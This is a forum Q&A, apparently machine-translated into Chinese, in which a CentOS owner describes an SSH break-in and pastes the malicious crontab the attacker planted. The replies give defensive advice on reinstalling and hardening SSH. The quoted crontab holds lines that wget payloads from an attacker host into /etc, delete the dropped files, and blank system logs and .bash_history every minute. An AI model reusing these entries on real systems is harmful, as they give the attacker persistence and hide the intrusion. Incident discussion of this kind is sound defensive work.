Ssh CentOS被黑客入侵，crontab被修改_Ssh_Crontab_Virus

Ssh CentOS被黑客入侵，crontab被修改

ssh

Ssh CentOS被黑客入侵，crontab被修改,ssh,crontab,virus,Ssh,Crontab,Virus,我相信有人/病毒侵入了我的CentOS，我最近打开了SSH一天。盒子在局域网里。我只是需要在外面用一会儿那天晚上，linux在局域网中通过SSH访问变得很慢，打开任何本地网页也很慢。它的行为很奇怪。我检查CPU，它有时非常高。所以我检查了crontab。它已经改变了有很多这样的东西： 20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd */120 * * * * cd /etc; wget http://www.dgnf

我相信有人/病毒侵入了我的CentOS，我最近打开了SSH一天。盒子在局域网里。我只是需要在外面用一会儿

那天晚上，linux在局域网中通过SSH访问变得很慢，打开任何本地网页也很慢。它的行为很奇怪。我检查CPU，它有时非常高。所以我检查了crontab。它已经改变了

有很多这样的东西：

20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history

我可以看到我的/etc/文件夹现在有许多红色文件夹，如下所示

srwsrwt  1 root root  1524643 Jan 31 21:06 atdd
-rwsrwsrwt  1 root root  1524643 Jan 31 21:06 atddd
srwsrwt  1 root root  1258750 Nov 24 14:22 cupsdd
-rwsrwsrwt  1 root root  1258750 Nov 24 14:22 cupsddd
srwsrwt  1 root root  1524643 Jan 31 21:06 ksapd
-rwsrwsrwt  1 root root  1524643 Jan 31 21:06 ksapdd
-rwsrwsrwt  1 root root  1524643 Jan 31 21:06 kysapdd
srwsrwt  1 root root  1524643 Jan 10 20:06 sksapd
-rwsrwsrwt  1 root root  1524643 Jan 31 21:07 sksapdd
-rwsrwsrwt  1 root root  1524643 Oct 24 04:55 skysapd
-rwsrwsrwt  1 root root  1524643 Jan 31 21:07 skysapdd
srwsrwt  1 root root  1524643 Feb  5 17:26 xfsdx
-rwsrwsrwt  1 root root  1524643 Feb  5 17:26 xfsdxd

发生了什么事？我能做什么？

一旦发生类似情况，只有完全重新安装机器才能解决问题。。特别是如果这是根用户的crontab文件

如果你真的想看看这个人是怎么进来的，如果他们没有植入根工具包，那么你可以查看类似/var/log/secure的日志，并查找sshd条目

但是，如果您的根用户已被破坏，唯一有意义的事情是完全重新安装

将来，您可以通过执行以下智能操作来最小化ssh访问问题：

不允许通过ssh进行密码登录。。。仅允许基于密钥的登录。这意味着只有个人资料中有正确私钥的人才能登录

不允许直接根用户登录（即使使用密钥），并要求通过sudo进行所有根用户访问。然后，您可以通过安全日志判断哪些用户使用了root访问

如果可能，通过iptables将开放的sshd端口限制为一系列源IP地址，而不是对所有人开放

将SSHD设置为在另一个端口上侦听，而不是从外部侦听22（您可以非常轻松地侦听端口22和另一个端口）。此步骤不会阻止积极扫描ssh端口的人，但会阻止只查看端口22的自动扫描

<>你也可以考虑建立一个需要共享证书连接整个局域网的VPN。OpenVPN是实现这一点的一种方法。许多路由器也可以做到这一点。然后，您可以通过VPN访问您的LAN，而不必单独将每个服务器直接暴露在Internet上

删除crontab上的所有这些行，检查日志（例如，

/var/log/messages

），还可以使用

last

查看最后的连接。并更改您的根密码以防万一。